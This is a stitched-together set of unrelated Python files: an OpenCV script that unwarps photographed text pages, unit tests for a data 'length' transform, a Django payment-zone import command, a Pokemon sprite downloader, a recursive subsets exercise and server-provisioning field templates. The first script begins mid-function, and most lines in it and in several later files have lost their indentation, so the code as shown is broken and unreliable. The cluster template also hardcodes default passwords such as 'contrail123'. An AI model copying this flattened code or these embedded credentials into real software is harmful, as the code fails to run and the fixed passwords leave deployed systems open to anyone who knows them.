img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
mean = img.mean()
if mean < 100:
img = 255-img
return cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY_INV, 101, 21)
def get_contours(img):
work = threshold(img)
debug_show('threshold', work)
contours, hierarchy = cv2.findContours(work, cv2.RETR_CCOMP,
cv2.CHAIN_APPROX_NONE)
return contours, hierarchy
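# Compatibility note (hedged): cv2.findContours returns two values in
# OpenCV 2.4 and 4.x but three (image, contours, hierarchy) in 3.x, so the
# two-value unpacking above assumes a non-3.x OpenCV; on 3.x it would be
# _, contours, hierarchy = cv2.findContours(...).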
def get_conics(img, contours, hierarchy,
abs_area_cutoff=0.0001, mean_area_cutoff=0.15):
hierarchy = hierarchy.reshape((-1, 4))
conics = []
used_contours = []
areas = []
okcontours = []
allchildren = []
pts = np.empty((0,1,2), dtype='float32')
centroid_accum = np.zeros(2)
total_area = 0.0
centroids = []
abs_area_cutoff *= img.shape[0] * img.shape[1]
    print('abs_area_cutoff =', abs_area_cutoff)
for i, (c, h) in enumerate(zip(contours, hierarchy.reshape((-1, 4)))):
next_idx, prev_idx, child_idx, parent_idx = h
if parent_idx >= 0:
continue
m = ellipse.moments_from_dict(cv2.moments(c))
if m[0] <= abs_area_cutoff:
continue
children = []
while child_idx >= 0:
child_contour = contours[child_idx]
cm = cv2.moments(child_contour)
if cm['m00'] > abs_area_cutoff:
children.append(child_contour)
allchildren.append(child_contour)
child_idx = hierarchy[child_idx][0]
if children:
work = np.zeros(img.shape[:2], dtype=np.uint8)
cv2.drawContours(work, contours, i, (1,1,1), -1)
cv2.drawContours(work, children, -1, (0,0,0), -1)
m = ellipse.moments_from_dict(cv2.moments(work, True))
centroids.append(m[1:3]/m[0])
centroid_accum += m[1:3]
total_area += m[0]
pts = np.vstack((pts, c.astype('float32')))
conic = ellipse.conic_from_moments(m)
okcontours.append(c)
conics.append(conic)
areas.append(m[0])
display = img.copy()
cv2.drawContours(display, okcontours+allchildren,
-1, (0, 255, 0),
6, cv2.LINE_AA)
debug_show('contours_only', display)
for c, a in zip(okcontours, areas):
x, y, w, h = cv2.boundingRect(c)
s = str('{:,d}'.format(int(a)))
#ctr = (x + w/2 - 15*len(s), y+h/2+10)
ctr = (x, y+h+20)
cv2.putText(display, s, ctr,
cv2.FONT_HERSHEY_SIMPLEX, 2.0,
(0, 0, 0), 12, cv2.LINE_AA)
cv2.putText(display, s, ctr,
cv2.FONT_HERSHEY_SIMPLEX, 2.0,
(0, 255, 0), 6, cv2.LINE_AA)
debug_show('contours', display)
areas = np.array(areas)
amean = areas.mean()
print('got {} contours with {} small.'.format(
len(areas), (areas < mean_area_cutoff*amean).sum()))
idx = np.where(areas > mean_area_cutoff*amean)[0]
conics = np.array(conics)
conics = conics[idx]
centroid_accum /= total_area
display = img.copy()
for conic in conics:
x0, y0, a, b, theta = ellipse.gparams_from_conic(conic)
cv2.ellipse(display, (int(x0), int(y0)), (int(a), int(b)),
theta*180/np.pi, 0, 360, (0,0,255), 6, cv2.LINE_AA)
debug_show('conics', display)
contours = [okcontours[i].astype('float32') for i in idx]
if 0:
centroids = np.array([centroids[i] for i in idx])
areas = areas[idx]
def polyfit(x, y):
coeffs = np.polyfit(x, y, deg=1)
ypred = np.polyval(coeffs, x)
ymean = np.mean(y)
sstot = np.sum((y - ymean)**2)
ssres = np.sum((y.flatten() - ypred.flatten())**2)
r2 = 1 - ssres/sstot
return coeffs, r2
xfit, xr2 = polyfit(centroids[:,0], areas)
yfit, yr2 = polyfit(centroids[:,1], areas)
xlabel = 'X coordinate (r²={:.2f})'.format(xr2)
ylabel = 'Y coordinate (r²={:.2f})'.format(yr2)
plt.plot(centroids[:,0], areas, 'b.', zorder=1)
plt.plot(centroids[:,1], areas, 'r.', zorder=1)
plt.gca().autoscale(False)
plt.plot([0, 3000], np.polyval(xfit, [0,3000]), 'b--',
zorder=0, label=xlabel)
plt.plot([0, 3000], np.polyval(yfit, [0,3000]), 'r--',
zorder=0, label=ylabel)
plt.legend(loc='upper right')
plt.xlabel('X/Y coordinate (px)')
plt.ylabel('Contour area (px²)')
plt.savefig('position-vs-area.pdf')
return conics, contours, centroid_accum
def optimize_conics(conics, p0):
x0 = np.array([0.0, 0.0])
hfunc = lambda x: centered_warp(p0[0], p0[1], x[0], x[1])
opt_results = []
f = lambda x: conic_area_discrepancy(conics, x, hfunc(x), opt_results)
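    # A derivative-free optimizer (Powell) is a natural fit here: the
    # objective is evaluated through warps and conic transforms, so no
    # analytic gradient is readily available.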
res = scipy.optimize.minimize(f, x0, method='Powell')
H = hfunc(res.x)
rects = []
if 0:
phi = np.linspace(0, 2*np.pi, 16, endpoint=False)
width, height = 0, 0
for x, H, fval in opt_results:
allxy = []
for conic in conics:
Hconic = ellipse.conic_transform(conic, H)
gparams = ellipse.gparams_from_conic(Hconic)
x, y = ellipse.gparams_evaluate(gparams, phi)
xy = np.dstack((x.reshape((-1, 1, 1)), y.reshape((-1, 1, 1))))
allxy.append(xy)
allxy = np.vstack(tuple(allxy)).astype(np.float32)
rect = cv2.boundingRect(allxy)
rects.append(rect)
x, y, w, h = rect
width = max(width, w)
height = max(height, h)
border = int(0.05 * min(width, height))
width += border
height += border
aspect = float(width)/height
if aspect < 2.0:
width = 2*height
else:
            height = width//2  # integer division keeps the image dimensions integral
for i, (rect, (x, H, fval)) in enumerate(zip(rects, opt_results)):
display = np.zeros((height, width), dtype=np.uint8)
x, y, w, h = rect
xoffs = width/2 - (x+w/2)
yoffs = height/2 - (y+h/2)
for conic in conics:
Hconic = ellipse.conic_transform(conic, H)
x0, y0, a, b, theta = ellipse.gparams_from_conic(Hconic)
cv2.ellipse(display, (int(x0+xoffs), int(y0+yoffs)), (int(a), int(b)),
theta*180/np.pi, 0, 360, (255,255,255), 6, cv2.LINE_AA)
cv2.putText(display, 'Area discrepancy: {:.3f}'.format(fval),
(16, height-24), cv2.FONT_HERSHEY_SIMPLEX, 2.0,
(255,255,255), 6, cv2.LINE_AA)
cv2.imwrite('frame{:04d}.png'.format(i), display)
return H
def orientation_detect(img, contours, H, rho=8.0, ntheta=512):
    # rasterize the warped text contours into a binary edge image
pts = np.vstack(tuple(contours))
shape, TH = warp_containing_points(img, pts, H, shape_only=True)
text_edges = np.zeros(shape, dtype=np.uint8)
for contour in contours:
contour = cv2.perspectiveTransform(contour.astype(np.float32), TH)
        cv2.drawContours(text_edges, [contour.astype(np.int32)], 0, (255,255,255))
debug_show('edges', text_edges)
# generate a linspace of thetas
thetas = np.linspace(-0.5*np.pi, 0.5*np.pi, ntheta, endpoint=False)
# rho is pixels per r bin in polar (theta, r) histogram
# irho is bins per pixel
irho = 1.0/rho
# get height and width
h, w = text_edges.shape
# maximum bin index is given by hypotenuse of (w, h) divided by pixels per bin
bin_max = int(np.ceil(np.hypot(w, h)*irho))
# initialize zeroed histogram height bin_max and width num theta
hist = np.zeros((bin_max, ntheta))
# let u and v be x and y coordinates (respectively) of non-zero
# pixels in edge map
v, u = np.mgrid[0:h, 0:w]
v = v[text_edges.view(bool)]
u = u[text_edges.view(bool)]
# get center coordinates
u0 = w*0.5
v0 = h*0.5
# for each i and theta = thetas[i]
for i, theta in enumerate(thetas):
# for each nonzero edge pixel, compute bin in r direction from
# pixel location and cos/sin of theta
bin_idx = ( (-(u-u0)*np.sin(theta) # x term
+ (v-v0)*np.cos(theta))*irho # y term, both
# divided by pixels
# per bin
+ 0.5*bin_max ) # offset for center pixel
        assert bin_idx.min() >= 0 and bin_idx.max() < bin_max
        # adding 0.5 before the int cast rounds to the nearest bin;
        # np.bincount returns the count of each integer in the array,
        # e.g. np.bincount([1, 1, 0, 3]) = [1, 2, 0, 1]
        bc = np.bincount((bin_idx + 0.5).astype(int))
# push this into the histogram
hist[:len(bc),i] = bc
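        # Worked mini-example (numbers illustrative, not from this script):
        # with rho = 2 px/bin (irho = 0.5) and bin_max = 100, an edge pixel at
        # signed distance 4.9 px from the center along this theta gives
        # bin_idx = 4.9*0.5 + 50 = 52.45, which rounds to r bin 52.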
    # count the empty (zero-count) r bins in each theta column
    num_zero = (hist == 0).sum(axis=0)
    # the best theta has the most empty bins: when theta matches the text
    # orientation, edge pixels collapse into a few densely populated rows
    best_theta_idx = num_zero.argmax()
# actual detected theta - could just return this now
theta = thetas[best_theta_idx]
# compose with previous homography
RH = np.dot(rotation(-theta), H)
if 1: # just debug visualization
debug_hist = (255*hist/hist.max()).astype('uint8')
debug_hist = cv2.cvtColor(debug_hist, cv2.COLOR_GRAY2RGB)
cv2.line(debug_hist,
(best_theta_idx, 0),
(best_theta_idx, bin_max), (255,0,0),
1, cv2.LINE_AA)
debug_show('histogram', debug_hist)
p0 = np.array((u0, v0))
t = np.array((np.cos(theta), np.sin(theta)))
warped = cv2.warpPerspective(img, TH, (shape[1], shape[0]),
borderMode=cv2.BORDER_REPLICATE)
debug_show('prerotate_noline', warped)
cv2.line(warped,
tuple(map(int, p0 - rho*bin_max*t)),
tuple(map(int, p0 + rho*bin_max*t)),
(255, 0, 0),
6, cv2.LINE_AA)
debug_show('prerotate', warped)
warped, _ = warp_containing_points(img, pts, RH)
debug_show('preskew', warped)
return RH
def skew_detect(img, contours, RH):
hulls = [cv2.convexHull(c) for c in contours]
pts = np.vstack(tuple(hulls))
display, TRH = warp_containing_points(img, pts, RH)
for h in hulls:
        h = cv2.perspectiveTransform(h, TRH).astype(np.int32)
cv2.drawContours(display, [h], 0, (255, 0, 255), 6, cv2.LINE_AA)
debug_show('convex_hulls_before', display)
f = lambda x: skewed_widths(contours, np.dot(slant(x), RH))
res = scipy.optimize.minimize_scalar(f, (-2.0, 0.0, 2.0))
SRH = np.dot(slant(res.x), RH)
warped, Hfinal = warp_containing_points(img, pts, SRH)
display = warped.copy()
for h in hulls:
        h = cv2.perspectiveTransform(h, Hfinal).astype(np.int32)
cv2.drawContours(display, [h], 0, (255, 0, 255), 6, cv2.LINE_AA)
debug_show('convex_hulls_after', display)
debug_show('final', warped)
return SRH
def main():
img = cv2.imread(sys.argv[1])
debug_show('input', img)
contours, hierarchy = get_contours(img)
conics, contours, centroid = get_conics(img, contours, hierarchy)
H = optimize_conics(conics, centroid)
RH = orientation_detect(img, contours, H)
SRH = skew_detect(img, contours, RH)
for img in DEBUG_IMAGES:
cv2.imshow('Debug', img)
while cv2.waitKey(5) < 0:
pass
if __name__ == '__main__':
main()
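
# Usage sketch (the filename is hypothetical; the script takes exactly one
# argument, an image of a page to rectify):
#   python unproject_text.py photo_of_page.jpg
# Debug images accumulate in DEBUG_IMAGES and are shown one by one at the end.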
|
import unittest
from visuanalytics.tests.analytics.transform.transform_test_helper import prepare_test
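
# Each test below exercises a single "length" transform step: "keys" selects
# the input value via a "|"-separated path (the test data sits under the
# "_req" root), and "new_keys" names the path where the computed length is
# stored.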
class TestTransformLength(unittest.TestCase):
def setUp(self):
self.data = {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"],
"string": "Das ist ein Testfall",
"tuple": ("Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
}
def test_length_list(self):
values = [
{
"type": "length",
"keys": ["_req|list"],
"new_keys": ["_req|len_list"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_list": 9
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length list failed")
def test_length_string(self):
values = [
{
"type": "length",
"keys": ["_req|string"],
"new_keys": ["_req|len_string"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_string": 20
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length string failed")
def test_length_tuple(self):
values = [
{
"type": "length",
"keys": ["_req|tuple"],
"new_keys": ["_req|len_tuple"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_tuple": 9
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length tuple failed")
def test_length_dict(self):
values = [
{
"type": "length",
"keys": ["_req|dict"],
"new_keys": ["_req|len_dict"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_dict": 9
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length dict failed")
|
from django.core.management.base import BaseCommand
from parkings.importers import PaymentZoneImporter
class Command(BaseCommand):
help = 'Uses the PaymentZoneImporter to import payment zones.'
def add_arguments(self, parser):
        parser.add_argument(
            'address',
            type=str,
            help=('Address from which to fetch the payment zone data')
        )
        parser.add_argument(
            'type',
            type=str,
            nargs='?',
            default='GeoJSON',
            help=('Type of the data: GeoJSON or WFS (defaults to GeoJSON)')
        )
        parser.add_argument(
            '--local',
            action='store_true',
            default=False,
            help=('Whether the address refers to a file on the local drive')
        )
def handle(self, *args, **options):
PaymentZoneImporter(
address=options['address'],
type=options['type'],
local=options['local'],
).import_payment_zones()
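
# Usage sketch (the command name is assumed to be this file's name under
# management/commands/, e.g. "import_payment_zones"):
#   python manage.py import_payment_zones https://example.com/zones.geojson GeoJSON
#   python manage.py import_payment_zones zones.geojson --local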
|
import os

import requests

# %ID% in the PokeAPI sprites URL is replaced with the national dex number.
base_url_all_pkms = 'https://raw.githubusercontent.com/PokeAPI/sprites/master/sprites/pokemon/%ID%.png'

if __name__ == '__main__':
    os.makedirs('../pokemons/sprites', exist_ok=True)  # ensure the output directory exists
    for i in range(1, 899):  # dex numbers 1..898 (range end is exclusive)
        url = base_url_all_pkms.replace('%ID%', str(i))
        pkm_sprite = requests.get(url=url)
        with open('../pokemons/sprites/' + str(i) + '.png', 'wb') as file:
            file.write(pkm_sprite.content)
|
"""
File: subsets.py
Name:
-------------------------
This file prints all the sub-lists on Console
by calling a recursive function - list_sub_lists(lst).
subsets.py is a famous LeetCode Medium problem
"""
def main():
"""
LeetCode Medium Problem
"""
list_sub_lists(['a', 'b', 'c', 'd', 'a'])
def list_sub_lists(lst):
"""
:param lst: list[str], containing a number of characters
"""
list_sub_lists_helper(lst, [])
def list_sub_lists_helper(lst, chosen):
if len(lst) == 0:
print(chosen)
else:
element = lst.pop()
# Not choose and explore
list_sub_lists_helper(lst, chosen)
# Choose and explore
chosen.append(element)
list_sub_lists_helper(lst, chosen)
# Un-choose
chosen.pop()
lst.append(element)
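
# Worked mini-example of the choose/explore/un-choose pattern above:
# list_sub_lists(['a', 'b']) prints, in order, [], ['a'], ['b'], ['b', 'a'] --
# 'b' is popped first, so it is the first element appended on the "choose"
# branch.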
if __name__ == '__main__':
main()
|
# Validation data structures: field templates for server, cluster and image objects.
server_fields = {
"match_keys": "['id', 'mac_address', 'cluster_id', 'ip_address', 'tag', 'where']",
"obj_name": "server",
"primary_keys": "['id', 'mac_address']",
"id": "",
"host_name": "",
"mac_address": "",
"ip_address": "",
"parameters": """{
'interface_name': '',
'partition': '',
}""",
"roles": [],
"cluster_id": "",
"subnet_mask": "",
"gateway": "",
"password": "",
"domain": "",
"email": "",
"ipmi_username": "",
"ipmi_type": "",
"ipmi_password": "",
"control_data_network": "",
"bond_interface": "",
"ipmi_address": "",
"tag": None,
"base_image_id": "",
"package_image_id": ""
}
cluster_fields = {
"match_keys": "['id', 'where']",
"obj_name": "cluster",
"id": "",
"email": "",
"primary_keys": "['id']",
"base_image_id": "",
"package_image_id": "",
"parameters": """{
'router_asn': '64512',
'database_dir': '/home/cassandra',
'database_token': '',
'openstack_mgmt_ip': '',
'use_certificates': 'False',
'multi_tenancy': 'True',
'encapsulation_priority': 'MPLSoUDP,MPLSoGRE,VXLAN',
'service_token': 'contrail123',
'keystone_username': 'admin',
'keystone_password': 'contrail123',
'keystone_tenant': 'admin',
'openstack_passwd': 'contrail123',
'analytics_data_ttl': '168',
'haproxy': 'disable',
'subnet_mask': '255.255.255.0',
'gateway': '10.204.221.46',
'password': 'c0ntrail123',
'external_bgp': '',
'domain': 'contrail.juniper.net'
}"""
}
image_fields = {
"match_keys": "['id', 'where']",
"obj_name": "image",
"primary_keys": "['id']",
"id": "",
"category": "",
"type": "",
"version": "",
"path": "",
"parameters": """{
"kickstart": "",
"kickseed":""
}"""
}
email_events = ["reimage_started", "reimage_completed", "provision_started", "provision_completed"]
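
# Note: the templates above share a convention -- "obj_name" names the object
# type, "primary_keys" identifies an instance, and "match_keys" lists the
# fields a query may filter on. (Interpretation inferred from the field names;
# the consuming code is not shown here.)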
|